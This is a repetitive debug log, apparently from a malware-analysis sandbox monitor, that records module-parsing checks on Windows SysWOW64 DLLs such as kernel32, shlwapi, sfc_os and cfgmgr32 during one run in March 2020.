2020-03-24 10:16:37,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,710 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,742 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,742 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,742 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,742 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,803 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,803 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,803 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,819 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:37,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,867 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,867 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,867 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:37,867 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,867 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:37,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,913 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,913 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,913 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:37,913 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:37,928 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:16:37,928 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:16:37,928 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:16:37,928 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:16:37,944 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:16:37,944 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:16:37,944 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:16:37,944 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:16:37,960 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:16:37,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:16:37,960 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:16:37,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:16:37,976 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:16:37,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:16:37,976 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wintrust.dll
2020-03-24 10:16:37,990 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\wintrust.dll
2020-03-24 10:16:37,990 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:16:37,990 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:16:37,990 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\AppPatch\AcGenral.dll
2020-03-24 10:16:38,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\AppPatch\AcGenral.dll
2020-03-24 10:16:38,006 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:16:38,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\uxtheme.dll
2020-03-24 10:16:38,006 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:38,006 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:38,023 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\samcli.dll
2020-03-24 10:16:38,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\samcli.dll
2020-03-24 10:16:38,023 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msacm32.dll
2020-03-24 10:16:38,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msacm32.dll
2020-03-24 10:16:38,023 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:16:38,038 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:16:38,038 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:38,038 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:38,038 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:38,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:38,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,053 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,069 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,085 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,101 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,131 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,147 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,147 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:38,147 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc.dll
2020-03-24 10:16:38,147 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc.dll
2020-03-24 10:16:38,163 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,163 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,163 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,163 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,178 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,194 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,210 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,224 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,224 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sfc_os.dll
2020-03-24 10:16:38,224 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\userenv.dll
2020-03-24 10:16:38,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\userenv.dll
2020-03-24 10:16:38,240 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:16:38,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\profapi.dll
2020-03-24 10:16:38,240 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:16:38,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\dwmapi.dll
2020-03-24 10:16:38,256 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:16:38,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\setupapi.dll
2020-03-24 10:16:38,272 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,272 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,272 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,288 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,319 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,335 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,349 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,349 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,381 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,397 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,397 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,397 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,413 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,444 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,459 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,459 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,459 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,474 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,474 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,506 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,522 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,569 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,584 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,599 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
